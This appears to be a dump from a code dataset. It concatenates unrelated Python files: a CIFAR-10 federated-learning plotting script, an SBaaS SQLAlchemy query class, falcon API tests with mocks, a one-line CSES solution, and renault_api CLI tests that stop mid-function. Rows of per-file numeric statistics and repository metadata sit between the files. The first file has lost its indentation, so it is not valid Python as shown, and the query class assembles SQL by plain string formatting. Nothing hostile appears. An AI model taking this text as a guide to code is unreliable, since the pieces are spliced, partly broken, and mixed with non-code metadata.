cifar_E3CS_inc_non_iid_p_file = open("output_cifar_E3CS_inc_non_iid_p.txt")
cifar_E3CS_inc_non_iid_p = []
with cifar_E3CS_inc_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make graph
plt.figure(8)
plt.plot(round_t, cifar_E3CS_0_non_iid_p, "pink")
plt.plot(round_t, cifar_E3CS_05_non_iid_p, 'b')
plt.plot(round_t, cifar_E3CS_08_non_iid_p, 'c')
plt.plot(round_t, cifar_E3CS_inc_non_iid_p, 'g')
plt.plot(round_t, cifar_FedCS_non_iid_p, 'y')
plt.plot(round_t, cifar_random_non_iid_p, 'orange')
plt.plot(round_t, cifar_pow_d_non_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, non-iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-10, iid, FedAvg-based (pow-d comparison)
cifar_pow_d_30_non_iid_a = [0] * 200
cifar_pow_d_50_non_iid_a = [0] * 200
cifar_pow_d_70_non_iid_a = [0] * 200
if os.path.isfile("output_cifar_pow-d=30_iid_a.txt"):
cifar_pow_d_30_non_iid_p_file = open("output_cifar_pow-d=30_iid_a.txt")
cifar_pow_d_30_non_iid_a = []
with cifar_pow_d_30_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_30_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d=50_iid_a.txt"):
cifar_pow_d_50_iid_a_file = open("output_cifar_pow-d=50_iid_a.txt")
cifar_pow_d_50_non_iid_a = []
with cifar_pow_d_50_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_50_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d=70_iid_a.txt"):
cifar_pow_d_70_iid_a_file = open("output_cifar_pow-d=70_iid_a.txt")
cifar_pow_d_70_non_iid_a = []
with cifar_pow_d_70_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_70_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make graph
plt.figure(9)
plt.plot(round_t, cifar_pow_d_30_non_iid_a, "pink")
plt.plot(round_t, cifar_pow_d_50_non_iid_a, 'b')
plt.plot(round_t, cifar_pow_d_70_non_iid_a, 'c')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based")
plt.legend(["pow-d=30", "pow-d=50", "pow-d=70"])
plt.show()
if __name__ == '__main__':
graph()
| 38.133874 | 88 | 0.555186 | 5,538 | 37,600 | 3.353738 | 0.019321 | 0.05298 | 0.045981 | 0.044473 | 0.986378 | 0.974425 | 0.947451 | 0.884025 | 0.858989 | 0.827653 | 0 | 0.05579 | 0.345 | 37,600 | 985 | 89 | 38.172589 | 0.698351 | 0.015186 | 0 | 0.516237 | 0 | 0 | 0.130377 | 0.101005 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00112 | false | 0 | 0.004479 | 0 | 0.005599 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c15e1e68b417c22602fac4356852de590f27209c | 21,242 | py | Python | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | from .stage01_quantification_peakInformation_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_peakInformation_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for this query class.
'''
tables_supported = {'data_stage01_quantification_peakInformation':data_stage01_quantification_peakInformation,
'data_stage01_quantification_peakResolution':data_stage01_quantification_peakResolution,
};
self.set_supportedTables(tables_supported);
# Query peakInfo_parameter from data_stage01_quantificaton_peakInformation
def get_peakInfoParameter_experimentID_dataStage01PeakInformation(self,experiment_id_I):
'''Query peakInfo_parameters that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.peakInfo_parameter).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.peakInfo_parameter).order_by(
data_stage01_quantification_peakInformation.peakInfo_parameter.asc()).all();
names_O = [];
for n in names:
names_O.append(n.peakInfo_parameter);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_peakInformation
def get_row_experimentIDAndComponentName_dataStage01PeakInformation(self, experiment_id_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakInformation).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.component_name.like(component_name_I),
data_stage01_quantification_peakInformation.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 peakInformation row retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name':d.component_group_name,
'component_name':d.component_name,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(self, experiment_id_I, peakInfo_parameter_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakInformation).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.component_name.like(component_name_I),
data_stage01_quantification_peakInformation.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakInformation.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 peakInformation row retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name':d.component_group_name,
'component_name':d.component_name,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_analysisID_dataStage01PeakInformation(
self,
analysis_id_I=[],
experiment_id_I=[],
peakInfo_parameter_I=[],
component_name_I=[],
component_group_name_I=[],
sample_name_abbreviation_I=[]
):
"""Query rows"""
try:
cmd = '''SELECT "data_stage01_quantification_peakInformation"."id",
"data_stage01_quantification_peakInformation"."analysis_id",
"data_stage01_quantification_peakInformation"."experiment_id",
"data_stage01_quantification_peakInformation"."component_group_name",
"data_stage01_quantification_peakInformation"."component_name",
"data_stage01_quantification_peakInformation"."peakInfo_parameter",
"data_stage01_quantification_peakInformation"."peakInfo_n",
"data_stage01_quantification_peakInformation"."peakInfo_ave",
"data_stage01_quantification_peakInformation"."peakInfo_cv",
"data_stage01_quantification_peakInformation"."peakInfo_lb",
"data_stage01_quantification_peakInformation"."peakInfo_ub",
"data_stage01_quantification_peakInformation"."peakInfo_units",
"data_stage01_quantification_peakInformation"."sample_names",
"data_stage01_quantification_peakInformation"."sample_name_abbreviation",
"data_stage01_quantification_peakInformation"."sample_types",
"data_stage01_quantification_peakInformation"."acqusition_date_and_times",
"data_stage01_quantification_peakInformation"."peakInfo_data",
"data_stage01_quantification_peakInformation"."used_",
"data_stage01_quantification_peakInformation"."comment_"
'''
cmd += '''
FROM "data_stage01_quantification_peakInformation"
'''
cmd += '''WHERE "data_stage01_quantification_peakInformation"."used_"
'''
if analysis_id_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".analysis_id =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(analysis_id_I));
cmd+=cmd_q;
if experiment_id_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".experiment_id =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(experiment_id_I));
cmd+=cmd_q;
if peakInfo_parameter_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation"."peakInfo_parameter" =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(peakInfo_parameter_I));
cmd+=cmd_q;
#if sample_name_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_name =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_name_I));
# cmd+=cmd_q;
#if sample_id_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_id =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_id_I));
# cmd+=cmd_q;
if sample_name_abbreviation_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_name_abbreviation =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(sample_name_abbreviation_I));
cmd+=cmd_q;
if component_name_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".component_name =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(component_name_I));
cmd+=cmd_q;
if component_group_name_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".component_group_name =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(component_group_name_I));
cmd+=cmd_q;
#if sample_type_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_type =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_type_I));
# cmd+=cmd_q;
#if acquisition_date_and_time_I and not acquisition_date_and_time_I[0] is None:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".acquisition_date_and_time >= %s'''%(
# acquisition_date_and_time_I[0]);
# cmd+=cmd_q;
# cmd_q = '''AND "data_stage01_quantification_peakInformation".acquisition_date_and_time <= %s'''%(
# acquisition_date_and_time_I[1]);
# cmd+=cmd_q;
cmd += '''
ORDER BY
"data_stage01_quantification_peakInformation"."analysis_id" ASC,
"data_stage01_quantification_peakInformation"."experiment_id" ASC,
"data_stage01_quantification_peakInformation"."sample_name_abbreviation" ASC,
"data_stage01_quantification_peakInformation"."component_group_name" ASC,
"data_stage01_quantification_peakInformation"."component_name" ASC,
"data_stage01_quantification_peakInformation"."peakInfo_parameter" ASC;
'''
result = self.session.execute(cmd);
data = result.fetchall();
data_O = [dict(d) for d in data];
return data_O;
except SQLAlchemyError as e:
print(e);
# Query component_names from data_stage01_quantificaton_peakInformation
def get_componentNames_experimentID_dataStage01PeakInformation(self,experiment_id_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.component_name).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.component_name).order_by(
data_stage01_quantification_peakInformation.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name);
return names_O;
except SQLAlchemyError as e:
print(e);
def get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(self,experiment_id_I,peakInfo_parameter_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.component_name).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.component_name).order_by(
data_stage01_quantification_peakInformation.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query peakInfo_parameter from data_stage01_quantification_peakResolution
def get_peakInfoParameter_experimentID_dataStage01PeakResolution(self,experiment_id_I):
'''Query peakInfo_parameters that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.peakInfo_parameter).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.peakInfo_parameter).order_by(
data_stage01_quantification_peakResolution.peakInfo_parameter.asc()).all();
names_O = [];
for n in names:
names_O.append(n.peakInfo_parameter);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_peakResolution
def get_row_experimentIDAndComponentName_dataStage01PeakResolution(self, experiment_id_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakResolution).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.component_name.like(component_name_I),
data_stage01_quantification_peakResolution.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 peakResolution row retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name_pair':d.component_group_name_pair,
'component_name_pair':d.component_name_pair,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(self, experiment_id_I, peakInfo_parameter_I, component_name_pair_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakResolution).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.component_name_pair.any(component_name_pair_I[0]),
data_stage01_quantification_peakResolution.component_name_pair.any(component_name_pair_I[1]),
data_stage01_quantification_peakResolution.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakResolution.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 peakResolution row retrieved per component_name_pair')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name_pair':d.component_group_name_pair,
'component_name_pair':d.component_name_pair,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
# Query component_names from data_stage01_quantification_peakResolution
def get_componentNamePairs_experimentID_dataStage01PeakResolution(self,experiment_id_I):
'''Query component_name_pairs that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.component_name_pair).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.component_name_pair).order_by(
data_stage01_quantification_peakResolution.component_name_pair.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name_pair);
return names_O;
except SQLAlchemyError as e:
print(e);
def get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(self,experiment_id_I,peakInfo_parameter_I):
'''Query component_name_pairs that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.component_name_pair).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.component_name_pair).order_by(
data_stage01_quantification_peakResolution.component_name_pair.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name_pair);
return names_O;
except SQLAlchemyError as e:
print(e);
#def reset_dataStage01_quantification_peakInformation(self,experiment_id_I = None):
# try:
# if experiment_id_I:
# reset = self.session.query(data_stage01_quantification_peakInformation).filter(data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
# self.session.commit();
# except SQLAlchemyError as e:
# print(e);
#def reset_dataStage01_quantification_peakResolution(self,experiment_id_I = None):
# try:
# if experiment_id_I:
# reset = self.session.query(data_stage01_quantification_peakResolution).filter(data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
# self.session.commit();
# except SQLAlchemyError as e:
# print(e);
def reset_dataStage01_quantification_peakInformation(self,
tables_I = ['data_stage01_quantification_peakInformation',
'data_stage01_quantification_peakResolution'],
experiment_id_I = None,
analysis_id_I = None,
warn_I=True):
try:
querydelete = sbaas_base_query_delete(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
for table in tables_I:
query = {};
query['delete_from'] = [{'table_name':table}];
query['where'] = []
if analysis_id_I:
query['where'].append({
'table_name':table,
'column_name':'analysis_id',
'value':analysis_id_I,
'operator':'LIKE',
'connector':'AND'
})
if experiment_id_I:
query['where'].append({
'table_name':table,
'column_name':'experiment_id',
'value':experiment_id_I,
'operator':'LIKE',
'connector':'AND'
})
table_model = self.convert_tableStringList2SqlalchemyModelDict([table]);
query = querydelete.make_queryFromString(table_model,query);
querydelete.reset_table_sqlalchemyModel(query_I=query,warn_I=warn_I);
except Exception as e:
print(e); | 57.410811 | 211 | 0.652669 | 2,154 | 21,242 | 5.985608 | 0.063603 | 0.171023 | 0.199721 | 0.21407 | 0.866362 | 0.812379 | 0.746529 | 0.688436 | 0.654774 | 0.620181 | 0 | 0.016949 | 0.263958 | 21,242 | 370 | 212 | 57.410811 | 0.807675 | 0.121552 | 0 | 0.660256 | 0 | 0 | 0.221528 | 0.132529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.025641 | 0 | 0.105769 | 0.051282 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c1b41e940cc0828bc4ad39d63e2de50ecbfff59c | 177 | py | Python | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
from diting.utils import *
from diting.parse import *
from diting.encoding import *
from diting.models import *
from diting.plot import *
| 19.666667 | 29 | 0.751412 | 27 | 177 | 4.925926 | 0.555556 | 0.37594 | 0.481203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.146893 | 177 | 8 | 30 | 22.125 | 0.874172 | 0.19209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c1df5c68918364d1ee130d155125e6b4ca0febbb | 3,806 | py | Python | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | import falcon
import pytest
import uuid
from mock import patch, MagicMock
from tracker.urls import app as application
application.req_options.auto_parse_form_urlencoded = True
mock = MagicMock()
mock.exists.return_value = 1
mock.setex = MagicMock()
mock.proc_req_delay = MagicMock()
@pytest.fixture
def app():
return application
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_success(client):
mock.setex.call_count = 0
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert resp.status == falcon.HTTP_201
assert mock.setex.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_returns_correct_response(client):
mock.setex.call_count = 0
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert 'cart_id' in resp.json
assert mock.setex.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_accept_param(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert mock.sismember.call_count == 1
assert cart_id == resp.json['cart_id']
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_handle_cookies(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
cookie = 'cart_id={0}'.format(cart_id)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert cart_id == resp.json['cart_id']
assert cookie == resp.headers['set-cookie'].split(';')[0]
assert mock.sismember.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_validate_input_fail(client):
mock.sismember.call_count = 0
uuid_1, uuid_2 = str(uuid.uuid4()), str(uuid.uuid4())
cookie = 'cart_id={0}'.format(uuid_1)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(uuid_2), payload, headers=headers)
assert resp.status == falcon.HTTP_400
assert resp.json['title'] == "Bad request"
assert mock.sismember.call_count == 0
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_validate_input_success(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
cookie = 'cart_id={0}'.format(cart_id)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert resp.status == falcon.HTTP_201
assert mock.sismember.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_cart_id_not_exist(client):
mock.setex.call_count = 0
cart_id = str(uuid.uuid4())
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert resp.status == falcon.HTTP_404
assert mock.setex.call_count == 0
| 35.90566 | 77 | 0.709143 | 539 | 3,806 | 4.810761 | 0.152134 | 0.041651 | 0.034709 | 0.049364 | 0.824913 | 0.804088 | 0.778249 | 0.762823 | 0.732742 | 0.732742 | 0 | 0.01369 | 0.136364 | 3,806 | 105 | 78 | 36.247619 | 0.775175 | 0 | 0 | 0.651163 | 0 | 0 | 0.211508 | 0.09485 | 0 | 0 | 0 | 0 | 0.186047 | 1 | 0.093023 | false | 0 | 0.05814 | 0.011628 | 0.162791 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a9da23b02a106bf09f211285c1eadf1692b49b91 | 92 | py | Python | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | print(*[int(((x**2*(x**2-1))/2)-4*(x-1)*(x-2)) for x in range(1,int(input())+1)],sep='\n')
| 46 | 91 | 0.478261 | 23 | 92 | 1.913043 | 0.521739 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104651 | 0.065217 | 92 | 1 | 92 | 92 | 0.406977 | 0 | 0 | 0 | 0 | 0 | 0.021978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
a9dbeed588769a487d0c3140087a6f2d11e9005c | 4,562 | py | Python | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 44 | 2020-11-01T15:52:33.000Z | 2022-03-31T04:40:03.000Z | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 334 | 2020-11-01T13:00:01.000Z | 2022-03-31T17:17:40.000Z | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 22 | 2020-11-20T08:26:26.000Z | 2022-03-11T18:58:31.000Z | """Test cases for the __main__ module."""
from aioresponses import aioresponses
from aioresponses.core import RequestCall
from click.testing import CliRunner
from tests import fixtures
from yarl import URL
from . import initialise_credential_store
from renault_api.cli import __main__
def test_hvac_history_day(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_history(
mocked_responses, start="20201101", end="20201130", period="day"
)
result = cli_runner.invoke(
__main__.main, "hvac history --from 2020-11-01 --to 2020-11-30 --period day"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_history_month(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_history(
mocked_responses, start="202011", end="202011", period="month"
)
result = cli_runner.invoke(
__main__.main, "hvac history --from 2020-11-01 --to 2020-11-30"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_cancel(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, result="cancel")
fixtures.inject_get_vehicle_details(mocked_responses, "zoe_40.1.json")
result = cli_runner.invoke(__main__.main, "hvac cancel")
assert result.exit_code == 0, result.exception
expected_json = {"data": {"attributes": {"action": "cancel"}, "type": "HvacStart"}}
expected_output = "{'action': 'cancel'}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output
def test_sessions(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_sessions(
mocked_responses, start="20201101", end="20201130"
)
result = cli_runner.invoke(
__main__.main, "hvac sessions --from 2020-11-01 --to 2020-11-30"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_start_now(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
